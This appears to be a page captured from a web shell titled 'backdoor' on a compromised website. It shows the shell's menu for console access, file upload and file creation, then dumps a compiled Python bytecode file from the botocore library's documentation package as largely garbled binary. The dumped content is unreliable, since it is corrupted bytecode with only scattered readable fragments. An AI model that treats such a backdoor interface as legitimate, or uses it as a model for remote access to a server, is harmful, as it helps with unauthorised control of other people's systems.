Website : rimsha.abasa.com
backdoor
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
proc
/
self
/
root
/
lib
/
python3
/
dist-packages
/
botocore
/
docs
/
__pycache__
/
Filename :
utils.cpython-310.pyc
back
Copy
o .&�a � @ s� d dl Z d dlmZ dd� Zdd� Zdd� Zed g d ��ZG dd � d e�ZG dd � d e�Z G dd� de�Z G dd� de�Zdddddd�Ze � d�ee je���Zdd� Zdd� ZdS )� N)� namedtuplec C s dddddddd�� | | �S )z�Get the Python type name for a given model type. >>> py_type_name('list') 'list' >>> py_type_name('structure') 'dict' :rtype: string �bytes�string�float�integer�dict�datetime)�blob� character�double�long�map� structure� timestamp��get�� type_name� r �5/usr/lib/python3/dist-packages/botocore/docs/utils.py�py_type_name s ��r c C s"